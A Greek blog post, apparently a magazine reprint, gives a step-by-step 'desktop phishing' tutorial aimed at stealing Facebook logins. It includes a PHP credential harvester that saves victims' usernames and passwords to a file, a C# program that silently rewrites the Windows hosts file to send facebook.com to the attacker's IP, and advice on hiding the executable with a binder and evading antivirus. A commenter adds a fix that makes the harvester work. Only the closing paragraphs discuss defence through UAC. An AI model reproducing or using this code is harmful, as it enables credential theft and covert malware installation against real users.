RSS

Desktop Phising εν δράση!

05 Dec

Απ’ τα αρχαία χρόνια μέχρι και σήμερα το μυαλό του ανθρώπου βασανιζόταν με σκέψεις και απορίες, σχετικά με το τι είναι πραγματικό και τι όχι. Πολλές φιλοσοφικές θεωρίες, θέλουν την πραγματικότητα που βιώνουμε, να είναι ένας αντικατοπτρισμός του πραγματικού κόσμου. Επίσης, αρκετές ταινίες επιστημονικής φαντασίας, όπως το Matrix, έχουν βασιστεί σε αυτό το ερώτημα. Αν στον ανθρώπινο κόσμο μας είναι δύσκολο να αντιληφθούμε το πραγματικό και να το ξεχωρίσουμε απ’ το πλασματικό, άραγε στον ψηφιακό κόσμο μπορούμε να κάνουμε έναν τέτοιο διαχωρισμό και αν όχι, πόσο επικίνδυνη είναι μια τέτοια παρανόηση για την εκεί επιβίωση μας;

Σίγουρα όλοι (και αν όχι όλοι, τουλάχιστον οι περισσότεροι) έχουμε ακουστά την τεχνική που ονομάζεται Phishing. Για όσους δεν το ξέρουν ο όρος Phishing προέρχεται απ’ την παραφθορά της λέξη Fishing που σημαίνει “ψάρεμα”. Όπως άλλωστε μας μαρτυράει και το όνομα της, η εν λόγο κακόβουλη τεχνική έχει σαν στόχο να παραπλανά τα θύματα της και στη συνέχεια να “ψαρέψει” τα ευαίσθητα προσωπικά δεδομένα τους ,όπως για παράδειγμα αριθμούς πιστωτικών καρτών, password κτλ. Άρθρα σχετικά με το Phishing έχουν προηγηθεί σε τεύχη του totalXAKER. Στο παρόν άρθρο θα εμβαθύνουμε -λίγο περισσότερο- στην τεχνική του Phishing πειραματιζόμενοι με κάτι (ας πούμε) πιο εξειδικευμένο και πιο …επικίνδυνο.

Πιο συγκεκριμένα, σε μια απλή επίθεση phishing ο επιτιθέμενος παραπλανά το θύμα του ισχυριζόμενος ότι αποστέλλει email εκ’ μέρους κάποιας γνωστής (υπαρκτής!) εταιρείας , τράπεζας, υπηρεσίας, οργανισμού κτλ και ζητά απ’ το θύμα του κάνοντας χρήση από πλαστά links να επισκεφτεί (άθελα του φυσικά) μια κακόβουλη ιστοσελίδα την οποία έχει δημιουργήσει ο ίδιος και είναι ολόιδια με τη γνήσια την οποία και επικαλείται. Στη συνέχεια με πρόσχημα την ασφάλεια ζητάει απ’ το θύμα του να εκτελέσει διάφορες ενέργειες όπως για παράδειγμα να ενημερώσει ή να επαληθεύσει άμεσα κάποια προσωπικά του στοιχεία. Έτσι, με τον τρόπο αυτό προσπαθεί να αποσπάσει τα απόρρητα προσωπικά δεδομένα που θα εισάγει ο χρήστης στο site που θα μεταβεί.

Περί Desktop Phishing ο λόγος

Όπως ήδη προλογίσαμε το Desktop Phishing αποτελεί μια πιο εξειδικευμένη αλλά ταυτόχρονα πιο ύπουλη και σαφώς πιο επικίνδυνη μορφή Phishing, απ’ όσες έχουμε αναλύσει μέχρι τώρα. Ο λόγος που την κατατάσσει στην κορυφή επικινδυνότητας είναι λόγο της τακτικής μέσω της οποίας υλοποιείται.

Πλέων ο επιτιθέμενος δε χρειάζεται να αποστείλει κάποιο email στο θύμα του με το link του αληθοφανούς Phishing site αφού κάνει απλά χρήση του πραγματικού site. Όχι μην ξαφνιάζεστε, κάτι τέτοιο είναι εφικτό και μάλιστα αρκετά εύκολα! Η τεχνική που σας περιγράφουμε στηρίζει την παραπλάνηση του θύματος στην επεξεργασία και μετέπειτα χρήση ενός μικρού αρχείου που υπάρχει σε κάθε Η/Υ με οποιοδήποτε λειτουργικό σύστημα και ακούει στο όνομα “hosts”.Το αρχείο hosts χρησιμοποιείτε από τα λειτουργικά συστήματα με σκοπό να αντιστοιχεί Ip διευθύνσεις με κάποιον hostname.

Πληροφοριακά να πούμε ότι: Σε ένα λειτουργικό σύστημα Windows θα συναντήσουμε το αρχείο “hosts” στο directory :

 %SystemRoot%\system32\drivers\etc\hosts 

ενώ αντίστοιχα σε ένα Linux ή BSD στο :

/etc/hosts

Για να πάρουμε μια γεύση σχετικά με το πως μοιάζει ένα τέτοιο αρχείο, θα ανοίξουμε με το NotePad το αυθεντικό αρχείο “hosts” ενός λειτουργικού συστήματος Windows Seven το οποίο θα έχει το ρόλο του θύματος στο σημερινό μας πείραμα.

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

Όπως παρατηρούμε όλες οι εγγραφές που υπάρχουν στο “hosts” έχουν στην αρχή τo χαρακτηριστικό σύμβολο “#”. Όπου υπάρχει “#” σε αρχεία συστήματος, το λειτουργικό απλά τα αγνοεί, αφού θεωρούνται ως επεξηγηματικά σχόλια. Για να εκτελεστούν οι εντολές που υπάρχουν, απλά θα πρέπει να αφαιρεθεί η “#” απ’ την αρχή.

Εικόνα 1: Έτσι μοιάζει το αρχείο hosts στο υπολογιστή του θύματος πριν να βάλουμε εμείς το χεράκι μας🙂

Σε αυτό το πείραμα θα χρειαστούμε δυο Η/Υ (ή δυο Virtual Mashines όπως και στη περίπτωση του γράφοντα):

  • Ο επιτιθέμενος θα χρησιμοποιήσει Linux Ubuntu 9.10.
  • Ενώ το θύμα Microsoft Windows Seven.

Δημιουργώντας τον απαραίτητο εξοπλισμό για την επίθεση.

Η λογική με βάσει την οποία θα εκτελεστεί η επίθεση είναι πολύ απλή. Ο επιτιθέμενος έχει σαν στόχο του να αντικαταστήσει με κάποιον τρόπο το υπάρχον αρχείο “hosts” του μηχανήματος του θύματος (Windows Seven) με ένα δικό του. Όπως μπορείτε να αντιληφθείτε ο απώτερος και δόλιος σκοπός του είναι να αντιστοιχήσει την ip του, με κάποιο γνωστό και ευρέως επισκέψιμο site όπως για παράδειγμα το Facebook.

Έτσι,με απλά λόγια κάθε φορά που το θύμα θα συνδέετε στο site του Facebook (ή οποιοσδήποτε άλλος χρήστης του συγκεκριμένου account στο μηχάνημα με τα Windows Seven), στην ουσία το λειτουργικό σύστημα θα παραπλανάτε και ακολουθώντας τις εγγραφές του αρχείου hosts θα συνδέετε με τον H/Y του επιτιθέμενου ο οποίος θα καταγράφει ότι κωδικούς εισαχθούν εκεί.

Βήμα 1: H Εγκατάσταση του Server.

Πρώτα απ’ όλα – και πριν κάνουμε την οποιαδήποτε ενέργεια – θα χρειαστεί να εφοδιαστούμε με τα απαραίτητα πακέτα για να στήσουμε ένα server τοπικά στο μηχάνημα του επιτιθέμενου ώστε στη συνέχεια να το προσομοιάσουμε με το site που θα “υποδυθούμε”!

Τα πακέτα που θα χρειαστούμε είναι τα:

  • php5
  • mysql-server
  • apache2
  • phpmyadmin

Για την εγκατάσταση των πακέτων αυτών, απλά θα χρειαστεί να γράψουμε στο τερματικό:

pr0n@Ubuntu:~$ sudo apt-get install php5 mysql-server apache2 phpmyadmin

Όταν ολοκληρωθεί η εγκατάσταση για να ενεργοποιήσουμε το service του apache2 θα πρέπει να εκτελέσουμε:

pr0n@Ubuntu:~$ sudo /etc/init.d/apache2 start

και αντίστοιχα για να απενεργοποιηθεί:

pr0n@Ubuntu:~$ sudo /etc/init.d/apache2 stop

Αν όλα έχουν πάει καλά όταν γράψουμε στην URL του browser μας 127.0.0.1 (ή localhost) θα εμφανιστεί ένα μήνυμα σε μορφή ιστοσελίδας (δηλαδή γραμμένο σε html) που θα γράφει “It Works!”

Αυτό σημαίνει ότι είμαστε έτοιμοι για να δημιουργήσουμε τις σελίδες του Phishing μας. Καταρχάς θα πρέπει να επισκεφτούμε τη γνήσια σελίδα του Facebook και να κάνουμε δεξί κλικ στην επιφάνεια της ιστοσελίδας και μετά “view page source” ώστε να αντιγράψουμε όλο τον πηγαίο κώδικα της. Έπειτα στο directory /var/www/ θα αντικαταστήσουμε τον πηγαίο κώδικα του υπάρχοντος αρχείου index.html (που περιέχει τον κώδικα του μηνύματος “it works”) κάνοντας επικόλληση τον κώδικα της ιστοσελίδας του facebook που είχαμε ήδη αντιγράψει και στη συνέχεια το σώζουμε.

Προσοχή: Επειδή κατά πάσα πιθανότητα το /var/www/ είναι writable μόνο απ’ τον root καλό είναι να αλλάξουμε τα δικαιώματά του συγκεκριμένου φακέλου και να τον κάνουμε Readable και Writable απ’ τον λογαριασμό του χρήστη που είμαστε συνδεδεμένοι (τον pr0n στην περίπτωση του γράφοντα). Για περισσότερες λεπτομέρειες δείτε την Εικόνα 2.

Εικόνα 2: Ο φάκελος που περιέχει το local server μας είναι ο var/www/ αλλά πρέπει να τον κάνουμε Readable και Writable για μας και όχι μόνο για τον root.

Αφού ολοκληρωθεί η αποθήκευση, δημιουργούμε μια ακόμα ιστοσελίδα (.php αυτή τη φορά) στο directory που βρισκόμαστε μέχρι τώρα και δίνουμε της δίνουμε το όνομα post.php.

<?php
header ('Location:https://login.facebook.com/login.php');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable =--> $value)
{
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Το post.php κάθε φορά που θα εκτελείται θα πλοηγεί το χρήστη στο site https://login.facebook.com/ και στη συνέχεια θα δημιουργεί (ή θα ενημερώνει στην περίπτωση που είναι ήδη δημιουργημένο) το αρχείο “passwords.txt” μέσα στο φάκελο /var/www/ ανάλογα με το τι έχει εισάγει το θύμα.

Τέλος θα χρειαστεί να επιστρέψουμε στο index.html για να το επεξεργαστούμε λίγο. Θα κατευθυνθούμε στη γραμμή που κάνει:

<form action="https://login.facebook.com/login.php?login_attempt=1" method="POST">

Το σημείο αυτό είναι που ελέγχεται η αυθεντικότητα του username και του password απ’ το Facebook και συγκεκριμένα απ’ τη σελίδα login.php. Εμείς, θα το αντικαθιστούμε την ιστοσελίδα αυτή με το post.php που δημιουργήσαμε και το αποτέλεσμα θα είναι κάπως έτσι :

</form><form action="post.php" method="POST">

όπως στην εικόνα 3. Εικόνα 3: Μια μικρή αλλά πολύ σημαντική αλλαγή μπορεί να αλλάξει τα πάντα!

Με αυτή την αλλαγή, κάθε φορά που το θύμα θα πατάει το κουμπί σύνδεσης του facebook θα μεταφέρετε απευθείας στο post.php το οποίο θα μαγκώνει το username και το password που εισήγαγε για να συνδεθεί, και στη συνέχει θα τον ανακατευθύνει πλέων στη γνήσια σελίδα https://login.facebook.com/login.php ώστε να μην υποψιαστεί τίποτα🙂

Αυτό είναι εμφανές στην εικόνα 4 αφού όπως μπορούμε να δούμε στη μπάρα των γεγονότων (κάτω) με το που θα γίνει κλικ στο κουμπί για σύνδεση θα γίνει εκτέλεση του post.php

Εικόνα 4: Το θύμα δεν έχει πάρει πρέφα ότι, ό,τι στοιχεία και να εισάγει θα αποθηκευτούν στο password.txt μέσω του post.php.

Για να το καταφέρουμε να αντικαταστήσουμε το υπάρχον αρχείο hosts, θα δημιουργήσουμε ένα μικρό πρόγραμμα (σε C# αυτή τη φορά). Επειδή όμως, όπως είπαμε και πρωτύτερα βρισκόμαστε σε λειτουργικό σύστημα Linux και η C# είναι κατεξοχήν microsoftική γλώσσα θα χρειαστεί να εγκαταστήσουμε το πακέτο monodevelop στο Linuxάκι μας. Για όσους δεν έτυχε να ασχοληθούν στο παρελθόν με τη C# σε άλλες πλατφόρμες εκτός των Windows, αξίζει να σημειώσουμε ότι το monodevelop (κατι αντίστοιχο με το Visual Studio της Microsoft) είναι ένα open source περιβάλλον για συγγραφή και αποσφαλμάτωση κώδικα σχετικού με το .NET Framework. Μπορεί να εγκατασταθεί σε Linux, Mac OS X καθώς και Windows.

Για την εγκατάσταση απλά θα χρειαστεί να εισάγουμε στο τερματικό μας:

pr0n@Ubuntu:~$sudo apt-get install monodevelop

Μόλις ολοκληρωθεί η εγκατάσταση, ανοίγουμε το monodevelop και αφού “φορτωθεί” το γραφικό περιβάλλον, πάμε στο menu File -> New -> Solution όπου εκεί θα δημιουργήσουμε ένα καινούριο Console application (το επιλέγουμε με το ποντίκι) και ορίζουμε το όνομα που θέλουμε να έχει η εφαρμογή που θα δημιουργήσουμε. Εμείς την ονομάσαμε “ChangeHostFile” και έπειτα πατάμε forword (Εικόνα 5).

Εικόνα 5: Δημιουργούμε ένα νέο console application project στο monodevelop.

Αφού ανοίξει ο editor γράφουμε τον παρακάτω κώδικα!

using System;
using System.IO;

namespace ChangeHostFile
{
    class Program
    {
        static void Main(string[] args)
        {
          string system = Environment.GetFolderPath(Environment.SpecialFolder.System);
          // Πάμε στο περιβόητο αρχείο hosts
          string hosts = system + "\\" + "drivers" + "\\" + "etc" + "\\" + "hosts";
          // Δημιουργούμε  ένα αρχείο ίδιο με το υπάρχον αρχειο hosts
          StreamWriter writer = new StreamWriter(hosts);
          // Τα δεδομένα που θα εισάγουμε στο καινούριο αρχείο hosts που θα δημιουργήσουμε🙂
          writer.WriteLine("# Copyright (c) 1993-2009 Microsoft Corp.");
          writer.WriteLine("#");
          writer.WriteLine("# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.");
          writer.WriteLine("#");
          writer.WriteLine("# This file contains the mappings of IP addresses to host names. Each");
          writer.WriteLine("# entry should be kept on an individual line. The IP address should");
          writer.WriteLine("# be placed in the first column followed by the corresponding host name.");
          writer.WriteLine("# The IP address and the host name should be separated by at least one");
          writer.WriteLine("# space.");
          writer.WriteLine("#");
          writer.WriteLine("# Additionally, comments (such as these) may be inserted on individual");
          writer.WriteLine("# lines or following the machine name denoted by a '#' symbol.");
          writer.WriteLine("#");
          writer.WriteLine("# For example:");
          writer.WriteLine("#");
          writer.WriteLine("#      102.54.94.97     rhino.acme.com          # source server");
          writer.WriteLine("#       38.25.63.10     x.acme.com              # x client host");
          // Σε αυτό το σημείο προσθέτουμε το site που θέλουμε να ψαρέψουμε.
          writer.WriteLine("192.168.0.138 www.facebook.com");
          writer.WriteLine("# localhost name resolution is handled within DNS itself");
          writer.WriteLine("#	127.0.0.1       localhost");
          writer.WriteLine("#	::1             localhost");
          writer.Write(Environment.NewLine);
          writer.Dispose();

        }
    }
}

Ο παραπάνω κώδικας δημιουργεί ένα αρχείο στο directory %SystemRoot\system32\drivers\etc\ των Windows Seven με την ονομασία hosts αντικαθιστώντας φυσικά το ήδη υπάρχον.

Στη γραμμή 34 του κώδικα μας, θα εισάγουμε την διεύθυνση IP που αντιστοιχεί στο μηχάνημα του επιτιθέμενου. Σε αυτή τη περίπτωση,αν το θύμα βρίσκετε στο ίδιο υπο-δίκτυο θα πρέπει να εισάγουμε τη παρακάτω γραμμή όπου και θα αντιστοιχήσουμε την Ιp διεύθυνση του μηχανήματος Ubuntu (του επιτιθέμενου) με το site του Facebook:

writer.Write("192.168.0.138     www.facebook.com             ");

Όπως μπορούμε να διαπιστώσουμε και απ’ την εικόνα 7 η ip διεύθυνση που αντιστοιχεί στο μηχάνημα του επιτιθέμενου είναι η 192.168.0.138.

Εικόνα 7: Η ip του επιτιθέμενου είναι 192.168.0.138 και αυτή θα χρησιμοποιήσει για να την αντιστοιχίσει με το site του Facebook

Ενώ αν αντίστοιχα το θύμα μας βρίσκετε σε κάποιον απομακρυσμένο υπολογιστή θα χρειαστεί να συμβουλευτούμε το site http://whatismyip.com/ ώστε να ενημερωθούμε για την IP μας εκείνη τη στιγμή, και θα συμπληρώσουμε ανάλογα την γραμμή 34:

writer.Write("78.45.63.10     www.facebook.com               ");

Αφού ολοκληρώσαμε την συγγραφή του κώδικα, για να κάνουμε compile πατάμε το F5 (ή εναλλακτικά απ το menu -> run) και ελέγχουμε το αποτέλεσμα για τυχόν σφάλματα από τυχών παραλήψεις ή λάθη. Αν αυτό που αντικρίσουμε μοιάζει με την εικόνα 6 τότε είμαστε σε πολύ καλό δρόμο αφού μόλις έγινε compile επιτυχώς στον κώδικα μας, και έχει δημιουργηθεί ένα εκτελέσιμο αρχείο με την ονομασία ChangeHostFile.exe στο φάκελο /home/pr0n/Projects/ChangeHostsFile/ChangeHostsFile/bin/Debug/ ή όπου αλλού το έχετε ορίσει εσείς στο δικό σας σύστημα

Εικόνα 6: Το εκτελέσιμο δημιουργήθηκε με επιτυχία. Καιρός να ρίξουμε το δόλωμα

Βήμα 3: Λίγο καμουφλάρισμα ακόμα, παρακαλώ.

Μόλις δημιουργήσαμε το αρχείο ChangeHostFile.exe το οποίο θα κάνει για μας την αλλαγή του αρχείου hosts στον Η/Υ του θύματος. Για να μην κινήσουμε όμως υποψίες και δεν είμαστε καλοί στο Social Engineering θα πρέπει να το “καμουφλάρουμε” με κάποιον τρόπο .Μια αρκετά απλή και εύκολη λύση λέγετε Binder. Binder (ή Joiner) είναι ένα πρόγραμμα το οποίο ενώνει δυο φαινομενικά “άσχετα” μεταξύ τους εκτελέσιμα αρχεία σε ένα. Έτσι, ενώ εκτελείται το ένα (το αθώο) όπως για παράδειγμα το εκτελέσιμο αρχειο της εγκατάστασης του καινούριου opera, ύπουλα και αθόρυβα εκτελείται και το δεύτερο το οποίο κάλλιστα στην περίπτωση μας, θα μπορούσε να περιέχει το ChangeHostFile.exe

Για λόγους καθαρά ευσυνειδησίας ο γράφων δε θα θελε να προτείνει κάποιο Binder, αλλά σίγουρα το Google είναι γεμάτο από ιστοσελίδες που θα λύσουν κάθε σχετική απορία σχετικά με το θέμα της καταλληλότητας κάποιου binder.

[Προσοχή: Τα περισσότερα binders είναι ανιχνεύσιμα από τα antivirus οπότε το καμουφλάζ θα πρέπει να γίνει με μεγάλη προσοχή ώστε να μη γίνουμε αντιληπτοί απ’ το antvirus το οποίο θα μας μαρτυρήσει στο θύμα μας😉

The Show Time.

Απ τη στιγμή που το θύμα θα εκτελέσει το αρχείο ChangeHostFile.exe στο σύστημα του, θα γίνει η μετατροπή στο υπάρχοντος hosts με το επεξεργασμένο απ’ τον επιτιθέμενο hosts όπως στην εικόνα 9.

Πλέων κάθε φορά που θα προσπαθεί να συνδεθεί το θύμα στο http://www.facebook.com άθελα του θα συνδέεται στην ip 192.168.0.138 όπου φυσικά από πίσω βρίσκετε ο επιτιθέμενος και καταγράφει το username και το password που θα εισαχθούν εκεί. Στις εικόνες 4 και 8 αντίστοιχα μπορούμε να δούμε το θύμα που είναι έτοιμο να συνδεθεί το “facebook” ενώ στη συνέχεια αυτή του η απόπειρα έχει καταγράφει απ’ τον επιτιθέμενο που καραδοκεί.

Εικόνα 8: Το username και το password του θύματος έχει “μαγκωθεί” απ’ το post.php και έχει αποθηκευτεί στο passwords.txt

Συμπεράσματα και.. παρατηρήσεις

Αν το θύμα είχε στη κατοχή του λειτουργικό σύστημα Windows ΧΡ (sp1/sp3) δεν θα είχε πάρει “πρέφα” για το τι συνέβη πίσω απ’ την πλάτη του όταν εκτέλεσε το αρχείο καθώς και πια μετατροπή υπέστη το αρχείο hosts και δυστυχώς ούτε και τρόπο να το αποτρέψει. Ο λόγος που επιλέξαμε τα Windows Seven ήταν καθαρά για να αυξήσουμε το επίπεδο δυσκολίας από πλευράς επιτιθέμενου. Βλέπετε ο χρήστης των Windows Seven έχει πλέων τη δυνατότητα να μπλοκάρει τέτοιου είδους κακόβουλες ενέργειες κάνοντας χρήση του (εκνευριστικού για πολλούς!) User Account Control. Έχουν υπάρξει πολλές περιπτώσεις όπου οι χρήστες εμφανώς ενοχλημένοι απ’ την συνεχή και αδιάκριτη παρουσία του User Account Control το έχουν απενεργοποιήσει. Δυστυχώς αυτό αποτελεί ένα τεράστιο σφάλμα στην ασφάλειας του εκάστοτε χρήστη προς χάριν της ευκολίας του.

Εικόνα 9: Το εκτελέσιμο που δημιουργήσαμε έκανε την μετατροπή του υπάρχοντος αρχείου hosts χωρίς να καταλάβει κανείς τίποτα και ιδιαίτερα το θύμα.

Στην περίπτωση που με όσα σας είπαμε σας τρομοκράτησαν και θέλετε να ενεργοποιήσουμε ξανά το UAC θα πάτε στο, Control Panel -> User Accounts and Family Safety -> User Accounts και από εκεί ορίζεται το επίπεδο ελέγχου να είναι στο 3/4 τουλάχιστον και κάνετε επανεκκίνηση. Στη περίπτωση αυτή αν εκτελέσουμε ξανά το προγραμματάκι που φτιάξαμε δεν θα μπορεί να κάνει την αντικατάσταση αφού δεν θα είχε τα απαραίτητα δικαιώματα administraton που απαιτούνται για μια τέτοια ενέργεια με αποτέλεσμα να “σκασει” πριν προλάβει καν να δράσει (Εικόνα 10).

Εικόνα 10: Πολλές φορές το User Account Control μας προστατεύει από τέτοιες ύπουλες επιθέσεις. Καλό είναι να το έχουμε ενεργό λοιπόν όσο και αν μας εκνευρίζει ώρες – ώρες!

 
2 Comments

Posted by on December 5, 2011 in It's Greek to Me

 

Tags: ,

2 responses to “Desktop Phising εν δράση!

  1. fousekis

    January 11, 2013 at 1:02 pm

    Με τα σημερινά δεδομένα δείχνει να μην δουλεύει…🙂

     
    • fousekis

      January 11, 2013 at 1:25 pm

      Ετσι δούλεψε…
      foreach($_POST as $variable => $value)

       

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: